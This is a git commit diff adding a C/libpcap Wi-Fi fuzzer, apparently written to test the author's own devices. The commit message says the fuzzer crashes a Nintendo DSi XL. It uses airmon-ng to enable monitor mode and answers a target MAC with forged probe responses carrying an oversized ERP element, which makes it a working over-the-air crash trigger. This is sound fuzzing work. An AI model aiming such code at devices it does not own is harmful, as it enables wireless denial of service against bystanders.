Added seperate modified fuzzer that crashes the DSI XL

DSI/IE/fuzzERP.c

@@ -0,0 +1,74 @@
+/*
+Fuzzes erp Information element
+*/
+#include <stdio.h>
+#include <stdlib.h>
+#include <stdint.h>
+#include <string.h>
+#include "../frameDefinitions.h"
+
+//Indecates whether the erpFuzzer is running
+int erpRunningState = 0;
+
+//Number of fuzzing states
+const int erpStates =  1;
+//Steps of fuzzers for each fuzzing state
+const int erpSteps[] =   {10};
+
+//Current state and step of the erpFuzzer
+int fuzzState;
+int fuzzStep;
+
+void erpPrintCurrentState()
+{
+    
+}
+
+//Updates erpFuzzer
+//Status 0 indicates start
+//Status 1 indicates increaseStep
+//Status 2 indicates stop
+//Returns -1 if done with fuzzing
+int erpFuzzUpdate(int status)
+{
+    fuzzState = 0;
+    if (fuzzStep == 0)
+        fuzzStep = 1;
+    else
+        fuzzStep = 0;
+
+    return 0;
+}
+
+//Returns an erp information element
+infoElem erpFuzz()
+{
+    infoElem erp;
+
+    //What to return when not fuzzed
+    if (fuzzStep == 0)
+    {
+        int dataSize = 10;
+
+        erp.id = 42;
+        erp.len = dataSize;
+        erp.len_data = dataSize;
+        //create data of datasize times 0xff
+        u_char *data = malloc(dataSize);
+        memset(data, 0xff, dataSize);
+        erp.data = data;   
+    }
+    else
+    {   
+        int dataSize = 253;
+
+        erp.id = 42;
+        erp.len = dataSize;
+        erp.len_data = dataSize;
+        //create data of datasize times 0xff
+        u_char *data = malloc(dataSize);
+        memset(data, 0xff, dataSize);
+        erp.data = data;   
+    }
+    return erp;
+}

DSI/IE/fuzzERP.h

@@ -0,0 +1,10 @@
+#ifndef FUZZERP_H_
+#define FUZZERP_H_
+
+#include "../frameDefinitions.h"
+
+int erpFuzzUpdate(int status);
+
+infoElem erpFuzz();
+
+#endif

DSI/Makefile

@@ -0,0 +1,9 @@
+default: all
+
+all: Cfuzz
+
+Cfuzz:
+	gcc -o cfuzz -IIE *.c IE/*.c -lpcap
+
+clean:
+	rm -f cfuzz

DSI/cfuzz.c

@@ -0,0 +1,266 @@
+/*
+This is the main file. It handles sending, receiving, but also monitoring of frames.
+*/
+#include <stdio.h>
+#include <pcap.h>
+#include <stdlib.h>
+#include <stdint.h>
+#include <string.h>
+#include <sys/time.h>
+#include "cfuzz.h"
+#include "frameCreator.h"
+#include "frameDefinitions.h"
+#include "fuzzer.h"
+
+#define DEBUG (0)
+#define SUTTIMEOUTMS (30000) //30s
+
+//Used for timing
+struct timeval tm1;
+struct timeval longtm;
+
+//Number of acked frames in current step
+int ackedFrames             = 0;
+
+//Copied from Wireshark
+u_char radioTapHeader[36]   =   "\x00\x00\x24\x00\x2f\x40\x00\xa0\x20\x08\x00\x00\x00\x00\x00\x00" \
+                                "\x9d\x5c\xa0\x15\x01\x00\x00\x00\x10\x02\x6c\x09\xa0\x00\xa7\x00" \
+                                "\x00\x00\xa7\x00";
+
+//Mac address of Atheros Wi-Fi dongle
+//Dongle will only ACK frames to its own MAC address
+u_char myMAC[6]            =  "\x00\x0a\xeb\x2d\x72\x55";
+
+//Mac address of SUT
+//Is needed to ignore frames from other devices
+/*List of MACs for test devices:
+- d0:17:6a:e8:e9:7a Samsung Galaxy Ace
+- xx:xx:xx:xx:xx:xx Chromecast 1
+- ec:9b:f3:1e:19:71 Samsung Galaxy S6
+- cc:fa:00:c9:fc:ad LG Optimus G
+- 12:42:2a:7e:d4:e8 Orange Pi Zero
+*/
+//Comment out the SUT
+//u_char sutMAC[6]            =  "\xec\x9b\xf3\x1e\x19\x71"; //Galaxy S6
+//u_char sutMAC[6]            =  "\xcc\xfa\x00\xc9\xfc\xad"; //LG Optimus G
+//u_char sutMAC[6]            =  "\xd0\x17\x6a\xe8\xe9\x7a"; //Galaxy Ace
+//u_char sutMAC[6]            =  "\x12\x42\x2a\x7e\xd4\xe8"; //Orange Pi Zero
+//u_char sutMAC[6]            =  "\xe0\xe7\x51\x45\x5e\x5d"; //DSI XL
+u_char sutMAC[6]            =  "\xe0\xe7\x51\x45\x5e\x5d"; //DSI XL
+
+
+//Returns filter for libpcap
+//we want to use as many filters here as possible, since libpcap is closer to the hardware than this user-level program
+//we only want to receive Probe requests, Authentication frames and Association requests, all to only our own MAC address or broadcast address in case of Probe requests
+//furthermore, all frames except ACK frames (have no send address) should be sent from the SUT MAC address
+//also, it is important not to compile and set the filter between each pcap_next. Otherwise ACK frames will be missed
+//when changing the filterString, the strncpy() locations should also be changed!
+const char *getFilterString()
+{
+    static char filterString[] = "wlan addr2 e0:e7:51:45:5e:5d";
+
+    return filterString;
+}
+
+//Starts timer by setting current (starting) time to tm1
+void startTimer()
+{
+    gettimeofday(&tm1, NULL);
+}
+
+//Stops timer by setting current (ending) time to tm2
+//Then compares difference in time and returns it in milliseconds
+unsigned long long stopTimer()
+{
+    struct timeval tm2;
+    gettimeofday(&tm2, NULL);
+
+    unsigned long long t = 1000 * (tm2.tv_sec - tm1.tv_sec) + (tm2.tv_usec - tm1.tv_usec) / 1000;
+    return t;
+}
+
+//Starts timer by setting current (starting) time to longtm
+//Longtimer is used to determine if it was more than X seconds since the SUT sent out frames
+void startLongTimer()
+{
+    gettimeofday(&longtm, NULL);
+}
+
+//Stops timer by setting current (ending) time to longtm2
+//Then compares difference in time and returns it in milliseconds
+unsigned long long stopLongTimer()
+{
+    struct timeval longtm2;
+    gettimeofday(&longtm2, NULL);
+
+    unsigned long long t = 1000 * (longtm2.tv_sec - longtm.tv_sec) + (longtm2.tv_usec - longtm.tv_usec) / 1000;
+    return t;
+}
+
+//Returns source address pointer location in packet
+u_char *getSourceAddrOfPacket(const u_char *packet)
+{
+    //get header length
+    u_char headerLength;
+    headerLength = packet[2];
+
+    //calculate offset to address
+    const u_char *addr;
+    int offset = headerLength;
+    offset = offset + 10;
+
+    //get pointer to address
+    addr = packet + offset;
+
+    return (u_char*) addr;
+}
+
+//Returns Version, Type and Subtype (one byte)
+u_char getFrameTypeOfPacket(const u_char *packet)
+{
+    //get header length
+    u_char headerLength;
+    headerLength = packet[2];
+
+    //calculate offset to frame type
+    const u_char *frameType;
+    int offset = headerLength;
+    offset = offset + 0;
+
+    //get pointer to frameType
+    frameType = packet + offset;
+
+    return *frameType;
+}
+
+//Sends packet using pcap. Returns status
+int sendPacket(pcap_t *pcap_h, u_char *packet, int size)
+{
+    int sendStatus = pcap_sendpacket(pcap_h, packet, size);
+
+    //when frame failed to send
+    if (sendStatus == 1)
+    {
+        printf("Failed to send frame:\n");
+        //print failed frame
+        int printCounter = 0;
+        for(int i = 0; i < size; i++)
+        {
+            printf("%02X ", packet[i]);
+            printCounter = printCounter + 1;
+            if (printCounter == 16)
+            {
+                printCounter = 0;
+                printf("\n");
+            }
+        }
+        printf("\n");
+    }
+    
+    return sendStatus;
+}
+
+int main(int argc, char *argv[])
+{
+    pcap_t  *pcap_h;
+    struct  bpf_program fp;
+    struct  pcap_pkthdr header;
+    char    *dev;
+    char    errbuf[PCAP_ERRBUF_SIZE];
+
+    //check argument number
+    if(argc != 2)
+    {
+        printf("Usage: %s device\n", argv[0]);
+        exit(EXIT_FAILURE);
+    }
+
+    dev = argv[1];
+
+    //initialize libpcap
+    if((pcap_h = pcap_create(dev, errbuf)) == NULL)
+    {
+         printf("pcap_create() failed: %s\n", errbuf);
+         exit(EXIT_FAILURE);
+    }
+
+    if(pcap_can_set_rfmon(pcap_h) == 0)
+    {
+        printf("Monitor mode can not be set.\n");
+        exit(EXIT_FAILURE);
+    }
+
+    if(pcap_set_rfmon(pcap_h, 1) != 0)
+    {
+        printf("Failed to set monitor mode.\n");
+        exit(EXIT_FAILURE);
+    }
+
+    if(pcap_activate(pcap_h) != 0)
+    {
+        printf("pcap_activate() failed\n");
+        exit(EXIT_FAILURE);
+    }
+
+    //compile filter for incoming packets
+    if(pcap_compile(pcap_h, &fp, getFilterString() , 0, PCAP_NETMASK_UNKNOWN) == -1)
+    {
+        printf("failed pcap_compile() with error: %s\n", pcap_geterr(pcap_h));
+        exit(EXIT_FAILURE);
+    }
+
+    //apply filter
+    if(pcap_setfilter(pcap_h, &fp) == -1)
+    {
+        printf("failed pcap_setfilter() with error: %s\n", pcap_geterr(pcap_h));
+        exit(EXIT_FAILURE);
+    }
+
+    //free memory allocated by pcap_compile()
+    pcap_freecode(&fp);
+
+    //flag to indicate if we have to listen for ACK verification
+    int waitForACK = 0;
+
+    //counter for continuous ACK fail
+    int noACKcounter = 0;
+
+    //start long timer
+    startLongTimer();
+
+    //infinite listen-respond loop
+    while (1)
+    {
+        //receive packet
+        const u_char *rpacket = pcap_next(pcap_h, &header);
+
+        printf("Received Frame\n");
+
+        int packetSize;
+        u_char *packet = createProbeResponse(sutMAC, &packetSize, radioTapHeader, myMAC);
+        sendPacket(pcap_h, packet, packetSize);
+        free(packet);      //free allocated memory
+
+        printf("Sent frame:\n");
+        //print failed frame
+        int printCounter = 0;
+        for(int i = 0; i < packetSize; i++)
+        {
+            printf("%02X ", packet[i]);
+            printCounter = printCounter + 1;
+            if (printCounter == 16)
+            {
+                printCounter = 0;
+                printf("\n");
+            }
+        }
+        printf("\n");
+
+        increaseFuzzer();
+
+        
+        
+    }
+
+    return 0;
+}

DSI/cfuzz.h

@@ -0,0 +1,8 @@
+#ifndef CFUZZ_H_
+#define CFUZZ_H_
+
+
+
+
+
+#endif

DSI/frameCreator.c

@@ -0,0 +1,158 @@
+/*
+Creates frames.
+*/
+#include <stdio.h>
+#include <stdlib.h>
+#include <stdint.h>
+#include <string.h>
+#include "frameCreator.h"
+#include "fuzzer.h"
+#include "frameDefinitions.h"
+#include "fuzzERP.h"
+
+
+
+//Creates Probe response frame
+u_char *createProbeResponse(u_char *dstAddress, int *packetSize, u_char * radioTapHeader, u_char *myMAC)
+{
+    #define numberOfProbeInfoElems (4)   //number of information elements
+
+    infoElem ssid = {
+        0,         //id
+        4,         //len
+        4,
+        "FUZZ" //data
+    };
+
+    infoElem suppRates = {
+        1,         //id
+        7,         //len
+        7,
+        "\x96\x18\x24\x30\x48\x60\x6c" //data
+    };
+
+    infoElem ds = {
+        3,         //id
+        1,         //len
+        1,
+        "\x01" //data
+    };
+    
+    infoElem erp = erpFuzz();
+
+    //create array of information elements
+    infoElem taggedParams[numberOfProbeInfoElems] = {ssid, suppRates, ds, erp};
+
+    //length of all info elements, including id and len field
+    int len_taggedParams = 0;
+    for(int i = 0; i < numberOfProbeInfoElems; i++)
+    {
+        if (taggedParams[i].len_data != -1) //do not include when len_data == -1
+        {
+            //+2 to include id and len field size
+            len_taggedParams = len_taggedParams + taggedParams[i].len_data+2; 
+        }
+    }
+
+    //fill in struct
+    probeResponse probeResp = { 
+        36, radioTapHeader,                //RadioTap hdr
+        1, "\x50",                         //Type
+        1, "\x00",                         //Flags
+        2, "\x3a\x01",                     //Duration
+        6, dstAddress,                     //DST addr
+        6, myMAC,                          //Source addr
+        6, myMAC,                          //BSS addr
+        2, "\x00\x00",                     //Seq nr         (overwritten by firmware)
+        8, "\x00\x00\x00\x00\x00\x00\x00\x00", //Timestamp  (overwritten by firmware)
+        2, "\x64\x00",                     //Beacon interval
+        2, "\x01\x00",                     //Capab info
+        
+        len_taggedParams,
+        taggedParams,                      //Information elements
+
+        4, "\x00\x00\x00\x00"              //FSC            (overwritten by firmware)
+    };
+
+    //calculate size of final packet
+    *packetSize = probeResp.len_radioTapHdr 
+                + probeResp.len_type
+                + probeResp.len_flags
+                + probeResp.len_duration
+                + probeResp.len_destAddr
+                + probeResp.len_sourceAddr
+                + probeResp.len_bssAddr
+                + probeResp.len_seqNr
+                + probeResp.len_timeStamp
+                + probeResp.len_beaconInterval
+                + probeResp.len_capabInfo
+                + probeResp.len_taggedParams
+                + probeResp.len_fsc;
+    
+    //define packet
+    u_char *probeRespPacket = malloc(*packetSize);
+    if(!probeRespPacket)
+    {
+        printf("Memory allocation error!\n");
+        exit(-1);
+    }
+
+    //copy all struct fields into packet
+    int copyOffset = 0;
+
+    memcpy(probeRespPacket + copyOffset, probeResp.radioTapHdr, probeResp.len_radioTapHdr);
+    copyOffset = copyOffset + probeResp.len_radioTapHdr;
+
+    memcpy(probeRespPacket + copyOffset, probeResp.type, probeResp.len_type);
+    copyOffset = copyOffset + probeResp.len_type;
+
+    memcpy(probeRespPacket + copyOffset, probeResp.flags, probeResp.len_flags);
+    copyOffset = copyOffset + probeResp.len_flags;
+
+    memcpy(probeRespPacket + copyOffset, probeResp.duration, probeResp.len_duration);
+    copyOffset = copyOffset + probeResp.len_duration;
+
+    memcpy(probeRespPacket + copyOffset, probeResp.destAddr, probeResp.len_destAddr);
+    copyOffset = copyOffset + probeResp.len_destAddr;
+
+    memcpy(probeRespPacket + copyOffset, probeResp.sourceAddr, probeResp.len_sourceAddr);
+    copyOffset = copyOffset + probeResp.len_sourceAddr;
+
+    memcpy(probeRespPacket + copyOffset, probeResp.bssAddr, probeResp.len_bssAddr);
+    copyOffset = copyOffset + probeResp.len_bssAddr;
+
+    memcpy(probeRespPacket + copyOffset, probeResp.seqNr, probeResp.len_seqNr);
+    copyOffset = copyOffset + probeResp.len_seqNr;
+
+    memcpy(probeRespPacket + copyOffset, probeResp.timeStamp, probeResp.len_timeStamp);
+    copyOffset = copyOffset + probeResp.len_timeStamp;
+
+    memcpy(probeRespPacket + copyOffset, probeResp.beaconInterval, probeResp.len_beaconInterval);
+    copyOffset = copyOffset + probeResp.len_beaconInterval;
+
+    memcpy(probeRespPacket + copyOffset, probeResp.capabInfo, probeResp.len_capabInfo);
+    copyOffset = copyOffset + probeResp.len_capabInfo;
+
+    //copy all information elements
+    for(int i = 0; i < numberOfProbeInfoElems; i++)
+    {
+        if (taggedParams[i].len_data != -1)  //if id == -1, we do not want to include the information element
+        {
+            memcpy(probeRespPacket + copyOffset, &taggedParams[i].id, 1);
+            copyOffset = copyOffset + 1;
+
+            memcpy(probeRespPacket + copyOffset, &taggedParams[i].len, 1);
+            copyOffset = copyOffset + 1;
+
+            memcpy(probeRespPacket + copyOffset, taggedParams[i].data, taggedParams[i].len_data);
+            copyOffset = copyOffset + taggedParams[i].len_data;
+        }
+    }
+        
+
+    memcpy(probeRespPacket + copyOffset, probeResp.fsc, probeResp.len_fsc);
+    copyOffset = copyOffset + probeResp.len_fsc;
+
+    //return packet
+    return probeRespPacket;    
+}

DSI/frameCreator.h

@@ -0,0 +1,14 @@
+#ifndef FRAMECREATOR_H_
+#define FRAMECREATOR_H_
+
+//Creates Authentication frame
+u_char *createAuthResponse(u_char *dstAddress, int *packetSize, u_char * radioTapHeader, u_char *myMAC);
+
+//Creates Association response
+u_char *createAssResponse(u_char *dstAddress, int *packetSize, u_char * radioTapHeader, u_char *myMAC);
+
+//Creates Probe response frame
+u_char *createProbeResponse(u_char *dstAddress, int *packetSize, u_char * radioTapHeader, u_char *myMAC);
+
+
+#endif

DSI/frameDefinitions.h

@@ -0,0 +1,145 @@
+/*
+Defines structs for frame types.
+*/
+#ifndef FRAMEDEFINITIONS_H_
+#define FRAMEDEFINITIONS_H_
+
+//the int len_* fields are only used for copying the data to a packet,
+//so no fuzzing on those fields! Fuzzing should only be done on u_char datatypes
+
+//Information element
+typedef struct {
+    u_char id;
+    u_char len;
+    int len_data;
+    u_char *data;
+} infoElem;
+
+//Probe response frame
+typedef struct {
+    int len_radioTapHdr; 	//usually 32 bytes
+    u_char *radioTapHdr;
+
+    int len_type;			//1 byte
+    u_char *type; 			//Protocol version, type and subtype
+
+    int len_flags;			//1 byte
+    u_char *flags;			//to DS, from DS, more Frag, Retry, Pwr Mgt, more Data, WEP, Order
+
+    int len_duration;		//2 bytes
+    u_char *duration;
+
+    int len_destAddr;		//6 bytes
+    u_char *destAddr;
+
+    int len_sourceAddr;		//6 bytes
+    u_char *sourceAddr;
+
+    int len_bssAddr;		//6 bytes
+    u_char *bssAddr;
+
+    int len_seqNr;			//2 bytes 
+    u_char *seqNr;
+
+    int len_timeStamp; 		//8 bytes 
+    u_char *timeStamp;
+
+    int len_beaconInterval;	//2 bytes 
+    u_char *beaconInterval;
+
+    int len_capabInfo;		//2 bytes 
+    u_char *capabInfo;
+
+    int len_taggedParams; 	//variable size
+    infoElem *taggedParams; 
+
+    int len_fsc;			//4 bytes 
+    u_char *fsc;
+
+} probeResponse;
+
+//Authentication frame
+typedef struct {
+    int len_radioTapHdr; 	//usually 32 bytes
+    u_char *radioTapHdr;
+
+    int len_type;			//1 byte
+    u_char *type; 			//Protocol version, type and subtype
+
+    int len_flags;			//1 byte
+    u_char *flags;			//to DS, from DS, more Frag, Retry, Pwr Mgt, more Data, WEP, Order
+
+    int len_duration;		//2 bytes
+    u_char *duration;
+
+    int len_destAddr;		//6 bytes
+    u_char *destAddr;
+
+    int len_sourceAddr;		//6 bytes
+    u_char *sourceAddr;
+
+    int len_bssAddr;		//6 bytes
+    u_char *bssAddr;
+
+    int len_seqNr;			//2 bytes 
+    u_char *seqNr;
+
+    int len_authAlg; 		//2 bytes 
+    u_char *authAlg;
+
+    int len_authSeq;		//2 bytes 
+    u_char *authSeq;
+
+    int len_status;			//2 bytes 
+    u_char *status;
+
+    int len_fsc;			//4 bytes 
+    u_char *fsc;
+
+} authResponse;
+
+
+//Association response frame
+typedef struct {
+    int len_radioTapHdr; 	//usually 32 bytes
+    u_char *radioTapHdr;
+
+    int len_type;			//1 byte
+    u_char *type; 			//Protocol version, type and subtype
+
+    int len_flags;			//1 byte
+    u_char *flags;			//to DS, from DS, more Frag, Retry, Pwr Mgt, more Data, WEP, Order
+
+    int len_duration;		//2 bytes
+    u_char *duration;
+
+    int len_destAddr;		//6 bytes
+    u_char *destAddr;
+
+    int len_sourceAddr;		//6 bytes
+    u_char *sourceAddr;
+
+    int len_bssAddr;		//6 bytes
+    u_char *bssAddr;
+
+    int len_seqNr;			//2 bytes 
+    u_char *seqNr;
+
+    int len_capabInfo; 		//2 bytes 
+    u_char *capabInfo;
+
+    int len_status;			//2 bytes 
+    u_char *status;
+
+    int len_assId;			//2 bytes 
+    u_char *assId;
+
+    int len_taggedParams; 	//variable size
+    infoElem *taggedParams; 
+
+    int len_fsc;			//4 bytes 
+    u_char *fsc;
+
+} assResponse;
+
+#endif

DSI/fuzzer.c

@@ -0,0 +1,38 @@
+/*
+Manages what to fuzz when.
+*/
+#include <stdio.h>
+#include <stdlib.h>
+#include <stdint.h>
+#include <string.h>
+#include "frameDefinitions.h"
+#include "fuzzERP.h"
+//CHANGE WHEN NEW SUBFUZZER
+
+//CHANGE WHEN NEW SUBFUZZER
+//Number of subfuzzers
+#define SUBFUZZERS (1)
+
+//CHANGE WHEN NEW SUBFUZZER
+//Array of pointers to subfuzzers update functions
+//int (*p[SUBFUZZERS]) (int i) = {vendorFuzzUpdate, rsnFuzzUpdate, bssloadFuzzUpdate, extcapabFuzzUpdate, apreportFuzzUpdate, htinfoFuzzUpdate, htcapabFuzzUpdate, extratesFuzzUpdate, erpFuzzUpdate, requestFuzzUpdate, hoptableFuzzUpdate, hopparmFuzzUpdate, countryFuzzUpdate, ibssFuzzUpdate, cfFuzzUpdate, timFuzzUpdate, dsFuzzUpdate, fhFuzzUpdate, ratesFuzzUpdate, ssidFuzzUpdate};
+int (*p[SUBFUZZERS]) (int i) = {erpFuzzUpdate};
+//State of sub-fuzzer
+//-1 = Done
+//0  = In progress
+int subFuzzState = -1;
+
+//Current sub-fuzzer
+//Starts with -1 to prevent skipping the first sub-fuzzer
+int subFuzzerIdx = -1;
+
+//Flag to indicate if the done with all subfuzzers notification has been sent
+int notifyDone = 0;
+
+int frameCounter = 0;
+
+//Controls state of fuzzer, and therefore what to fuzz next
+void increaseFuzzer()
+{
+    erpFuzzUpdate(0);
+}

DSI/fuzzer.h

@@ -0,0 +1,6 @@
+#ifndef FUZZER_H_
+#define FUZZER_H_
+
+void increaseFuzzer();
+
+#endif

DSI/monitor.sh

@@ -0,0 +1,2 @@
+airmon-ng start wlx000aeb2d7255
+ip link set wlan0mon up

fuzzer/cfuzz.c

@@ -35,16 +35,27 @@ u_char myMAC[6]            =  "\x00\x0a\xeb\x2d\x72\x55";
 //Is needed to ignore frames from other devices
 /*List of MACs for test devices:
 - d0:17:6a:e8:e9:7a Samsung Galaxy Ace
-- xx:xx:xx:xx:xx:xx Chromecast 1
+- 6c:ad:f8:c8:77:ca Chromecast 1
 - ec:9b:f3:1e:19:71 Samsung Galaxy S6
 - cc:fa:00:c9:fc:ad LG Optimus G
 - 12:42:2a:7e:d4:e8 Orange Pi Zero
+- 00:09:bf:7d:6d:aa Nintendo DS
 */
 //Comment out the SUT
 //u_char sutMAC[6]            =  "\xec\x9b\xf3\x1e\x19\x71"; //Galaxy S6
 //u_char sutMAC[6]            =  "\xcc\xfa\x00\xc9\xfc\xad"; //LG Optimus G
 //u_char sutMAC[6]            =  "\xd0\x17\x6a\xe8\xe9\x7a"; //Galaxy Ace
-u_char sutMAC[6]            =  "\x12\x42\x2a\x7e\xd4\xe8"; //Orange Pi Zero
+//u_char sutMAC[6]            =  "\x12\x42\x2a\x7e\xd4\xe8"; //Orange Pi Zero
+//u_char sutMAC[6]            =  "\x00\x09\xbf\x7d\x6d\xaa"; //Nintendo DS
+//u_char sutMAC[6]            =  "\x00\x01\x4a\x93\xce\x34"; //PSP
+//u_char sutMAC[6]            =  "\xe0\xe7\x51\x45\x5e\x5d"; //DSI
+//u_char sutMAC[6]            =  "\x9c\xe6\x35\x2a\x69\x16"; //WII U
+u_char sutMAC[6]            =  "\x6c\xad\xf8\xc8\x77\xca"; //Chromecast 1
+
+
+
+
+
 
 //Returns filter for libpcap
 //we want to use as many filters here as possible, since libpcap is closer to the hardware than this user-level program